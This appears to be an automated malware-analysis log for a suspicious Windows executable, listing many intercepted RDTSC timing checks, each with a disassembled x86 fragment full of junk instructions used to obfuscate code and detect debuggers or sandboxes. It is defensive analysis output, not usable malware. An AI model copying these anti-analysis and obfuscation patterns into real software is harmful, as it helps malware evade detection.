Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D506A3 second address: 4D5072D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0E05507507h 0x00000009 sbb ecx, 3083F02Eh 0x0000000f jmp 00007F0E05507509h 0x00000014 popfd 0x00000015 mov ch, 7Ah 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov eax, dword ptr [ebx+54h] 0x0000001d jmp 00007F0E05507503h 0x00000022 mov dword ptr [esi+18h], eax 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007F0E055074FBh 0x0000002e xor ax, 7AEEh 0x00000033 jmp 00007F0E05507509h 0x00000038 popfd 0x00000039 mov ch, 36h 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D5072D second address: 4D50769 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E05506CEAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+58h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F0E05506CEDh 0x00000015 xor al, FFFFFFD6h 0x00000018 jmp 00007F0E05506CF1h 0x0000001d popfd 0x0000001e mov ax, E947h 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50769 second address: 4D507A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E055074FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+1Ch], eax 0x0000000c jmp 00007F0E055074FEh 0x00000011 mov eax, dword ptr [ebx+5Ch] 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F0E05507507h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D507A7 second address: 4D507AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D507AD second address: 4D507E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+20h], eax 0x0000000b pushad 0x0000000c mov cl, bl 0x0000000e mov bx, ax 0x00000011 popad 0x00000012 mov eax, dword ptr [ebx+60h] 0x00000015 jmp 00007F0E05507500h 0x0000001a mov dword ptr [esi+24h], eax 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F0E055074FAh 0x00000026 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D507E3 second address: 4D507E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D507E7 second address: 4D507ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D507ED second address: 4D507FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E05506CEDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D507FE second address: 4D50831 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+64h] 0x0000000b jmp 00007F0E055074FDh 0x00000010 mov dword ptr [esi+28h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov edx, 5DB7488Eh 0x0000001b jmp 00007F0E055074FFh 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50831 second address: 4D508B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F0E05506CEFh 0x00000008 pop esi 0x00000009 call 00007F0E05506CF9h 0x0000000e pop esi 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 mov eax, dword ptr [ebx+68h] 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F0E05506CEDh 0x0000001c and ax, 5E26h 0x00000021 jmp 00007F0E05506CF1h 0x00000026 popfd 0x00000027 pushfd 0x00000028 jmp 00007F0E05506CF0h 0x0000002d and si, D7C8h 0x00000032 jmp 00007F0E05506CEBh 0x00000037 popfd 0x00000038 popad 0x00000039 mov dword ptr [esi+2Ch], eax 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D508B6 second address: 4D508BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D508BA second address: 4D508C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D508C0 second address: 4D508D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E055074FAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ax, word ptr [ebx+6Ch] 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D508D8 second address: 4D508DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D508DC second address: 4D508E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D508E2 second address: 4D508E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D508E8 second address: 4D508EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D508EC second address: 4D50969 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov word ptr [esi+30h], ax 0x0000000c jmp 00007F0E05506CEAh 0x00000011 mov ax, word ptr [ebx+00000088h] 0x00000018 jmp 00007F0E05506CF0h 0x0000001d mov word ptr [esi+32h], ax 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007F0E05506CEDh 0x0000002a xor ecx, 16C1A3A6h 0x00000030 jmp 00007F0E05506CF1h 0x00000035 popfd 0x00000036 pushfd 0x00000037 jmp 00007F0E05506CF0h 0x0000003c or si, 0148h 0x00000041 jmp 00007F0E05506CEBh 0x00000046 popfd 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50969 second address: 4D509FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0E055074FFh 0x00000009 adc ax, 738Eh 0x0000000e jmp 00007F0E05507509h 0x00000013 popfd 0x00000014 mov ch, 7Eh 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov eax, dword ptr [ebx+0000008Ch] 0x0000001f pushad 0x00000020 jmp 00007F0E05507509h 0x00000025 pushad 0x00000026 push ecx 0x00000027 pop ebx 0x00000028 mov ebx, esi 0x0000002a popad 0x0000002b popad 0x0000002c mov dword ptr [esi+34h], eax 0x0000002f jmp 00007F0E05507504h 0x00000034 mov eax, dword ptr [ebx+18h] 0x00000037 jmp 00007F0E05507500h 0x0000003c mov dword ptr [esi+38h], eax 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D509FA second address: 4D509FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D509FE second address: 4D50A1B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E05507509h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50A1B second address: 4D50AA2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0E05506CF7h 0x00000009 xor ah, 0000006Eh 0x0000000c jmp 00007F0E05506CF9h 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007F0E05506CF0h 0x00000018 or cx, C1E8h 0x0000001d jmp 00007F0E05506CEBh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 mov eax, dword ptr [ebx+1Ch] 0x00000029 jmp 00007F0E05506CF6h 0x0000002e mov dword ptr [esi+3Ch], eax 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007F0E05506CEAh 0x0000003a rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50AA2 second address: 4D50AA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50AA6 second address: 4D50AAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50AAC second address: 4D50AFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, esi 0x00000005 jmp 00007F0E05507508h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [ebx+20h] 0x00000010 pushad 0x00000011 mov al, DFh 0x00000013 movsx edi, si 0x00000016 popad 0x00000017 mov dword ptr [esi+40h], eax 0x0000001a pushad 0x0000001b push eax 0x0000001c pushad 0x0000001d popad 0x0000001e pop ebx 0x0000001f pushad 0x00000020 mov di, ax 0x00000023 mov cx, F89Bh 0x00000027 popad 0x00000028 popad 0x00000029 lea eax, dword ptr [ebx+00000080h] 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F0E055074FDh 0x00000036 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50AFD second address: 4D50B03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50B03 second address: 4D50B07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50B07 second address: 4D50B47 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E05506CF3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push 00000001h 0x0000000d jmp 00007F0E05506CF6h 0x00000012 nop 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F0E05506CEAh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50B47 second address: 4D50B4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50B4D second address: 4D50C0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0E05506CECh 0x00000008 movzx eax, dx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jmp 00007F0E05506CECh 0x00000014 nop 0x00000015 pushad 0x00000016 mov dx, cx 0x00000019 mov ecx, 54A83659h 0x0000001e popad 0x0000001f lea eax, dword ptr [ebp-10h] 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007F0E05506CF2h 0x00000029 and eax, 638094E8h 0x0000002f jmp 00007F0E05506CEBh 0x00000034 popfd 0x00000035 call 00007F0E05506CF8h 0x0000003a pushfd 0x0000003b jmp 00007F0E05506CF2h 0x00000040 jmp 00007F0E05506CF5h 0x00000045 popfd 0x00000046 pop ecx 0x00000047 popad 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c call 00007F0E05506CF9h 0x00000051 pop ecx 0x00000052 mov edx, 5685B0B4h 0x00000057 popad 0x00000058 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50C0A second address: 4D50C47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, 32h 0x00000005 push ebx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F0E05507508h 0x00000016 or eax, 11F8D198h 0x0000001c jmp 00007F0E055074FBh 0x00000021 popfd 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50C47 second address: 4D50C4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50C4C second address: 4D50C62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E05507502h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50CAA second address: 4D50CC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E05506CF4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50CC2 second address: 4D50D10 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E055074FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test edi, edi 0x0000000d pushad 0x0000000e mov esi, 54A4DEFBh 0x00000013 pushad 0x00000014 call 00007F0E055074FEh 0x00000019 pop esi 0x0000001a mov ax, bx 0x0000001d popad 0x0000001e popad 0x0000001f js 00007F0E760E5EC9h 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F0E05507508h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50D10 second address: 4D50D16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50D16 second address: 4D50D1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50D1A second address: 4D50D1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50D1E second address: 4D50D2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebp-0Ch] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50D2F second address: 4D50D33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50D33 second address: 4D50D39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50D39 second address: 4D50D3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50D3F second address: 4D50D79 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E055074FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+04h], eax 0x0000000e jmp 00007F0E05507506h 0x00000013 lea eax, dword ptr [ebx+78h] 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 movsx ebx, si 0x0000001c mov al, C6h 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50D79 second address: 4D50D7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50D7E second address: 4D50E2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edi, eax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 00000001h 0x0000000b jmp 00007F0E05507506h 0x00000010 nop 0x00000011 pushad 0x00000012 call 00007F0E055074FEh 0x00000017 pushfd 0x00000018 jmp 00007F0E05507502h 0x0000001d and si, 6958h 0x00000022 jmp 00007F0E055074FBh 0x00000027 popfd 0x00000028 pop ecx 0x00000029 mov cl, dl 0x0000002b popad 0x0000002c push eax 0x0000002d pushad 0x0000002e pushfd 0x0000002f jmp 00007F0E05507501h 0x00000034 add ch, FFFFFFF6h 0x00000037 jmp 00007F0E05507501h 0x0000003c popfd 0x0000003d mov edi, esi 0x0000003f popad 0x00000040 nop 0x00000041 pushad 0x00000042 jmp 00007F0E05507508h 0x00000047 movzx eax, di 0x0000004a popad 0x0000004b lea eax, dword ptr [ebp-08h] 0x0000004e push eax 0x0000004f push edx 0x00000050 pushad 0x00000051 movsx edi, cx 0x00000054 popad 0x00000055 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50E2B second address: 4D50E31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50EDF second address: 4D50EE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50EE4 second address: 4D50EEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50EEA second address: 4D50EEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50EEE second address: 4D50F0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edi, eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0E05506CF0h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50F0A second address: 4D50F10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50F10 second address: 4D50F14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50F14 second address: 4D50FDC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E055074FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test edi, edi 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F0E055074FCh 0x00000014 xor eax, 23200DE8h 0x0000001a jmp 00007F0E055074FBh 0x0000001f popfd 0x00000020 pushfd 0x00000021 jmp 00007F0E05507508h 0x00000026 add si, A048h 0x0000002b jmp 00007F0E055074FBh 0x00000030 popfd 0x00000031 popad 0x00000032 js 00007F0E760E5C3Bh 0x00000038 jmp 00007F0E05507506h 0x0000003d mov eax, dword ptr [ebp-04h] 0x00000040 jmp 00007F0E05507500h 0x00000045 mov dword ptr [esi+08h], eax 0x00000048 pushad 0x00000049 mov bh, cl 0x0000004b mov ah, dh 0x0000004d popad 0x0000004e lea eax, dword ptr [ebx+70h] 0x00000051 jmp 00007F0E05507502h 0x00000056 push 00000001h 0x00000058 push eax 0x00000059 push edx 0x0000005a jmp 00007F0E05507507h 0x0000005f rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50FDC second address: 4D50FE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50FE2 second address: 4D50FE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50FE6 second address: 4D51064 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E05506CEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c jmp 00007F0E05506CF6h 0x00000011 push eax 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F0E05506CF1h 0x00000019 and si, E2E6h 0x0000001e jmp 00007F0E05506CF1h 0x00000023 popfd 0x00000024 push ecx 0x00000025 push ebx 0x00000026 pop eax 0x00000027 pop edi 0x00000028 popad 0x00000029 nop 0x0000002a pushad 0x0000002b mov edx, eax 0x0000002d mov dx, ax 0x00000030 popad 0x00000031 lea eax, dword ptr [ebp-18h] 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F0E05506CF9h 0x0000003b rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D51064 second address: 4D51074 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E055074FCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D51074 second address: 4D51078 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D51078 second address: 4D51087 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D51087 second address: 4D5108B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D5108B second address: 4D5108F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D5108F second address: 4D51095 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D51095 second address: 4D510FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0E055074FEh 0x00000008 pushfd 0x00000009 jmp 00007F0E05507502h 0x0000000e xor ah, FFFFFFA8h 0x00000011 jmp 00007F0E055074FBh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov dword ptr [esp], eax 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F0E055074FBh 0x00000026 sub si, D2EEh 0x0000002b jmp 00007F0E05507509h 0x00000030 popfd 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D510FD second address: 4D51114 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E05506CF3h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D51150 second address: 4D51164 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E05507500h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D51164 second address: 4D51168 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D51168 second address: 4D5122D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test edi, edi 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F0E055074FDh 0x00000011 or ah, 00000046h 0x00000014 jmp 00007F0E05507501h 0x00000019 popfd 0x0000001a pushfd 0x0000001b jmp 00007F0E05507500h 0x00000020 and cl, FFFFFFE8h 0x00000023 jmp 00007F0E055074FBh 0x00000028 popfd 0x00000029 popad 0x0000002a js 00007F0E760E59EEh 0x00000030 jmp 00007F0E05507506h 0x00000035 mov eax, dword ptr [ebp-14h] 0x00000038 jmp 00007F0E05507500h 0x0000003d mov ecx, esi 0x0000003f pushad 0x00000040 mov dx, ax 0x00000043 mov si, 5889h 0x00000047 popad 0x00000048 mov dword ptr [esi+0Ch], eax 0x0000004b jmp 00007F0E05507504h 0x00000050 mov edx, 759B06ECh 0x00000055 jmp 00007F0E05507500h 0x0000005a sub eax, eax 0x0000005c push eax 0x0000005d push edx 0x0000005e jmp 00007F0E055074FCh 0x00000063 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D5122D second address: 4D5126F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F0E05506CF1h 0x00000008 pop esi 0x00000009 jmp 00007F0E05506CF1h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 lock cmpxchg dword ptr [edx], ecx 0x00000015 jmp 00007F0E05506CEEh 0x0000001a pop edi 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D5126F second address: 4D5128C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E05507509h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
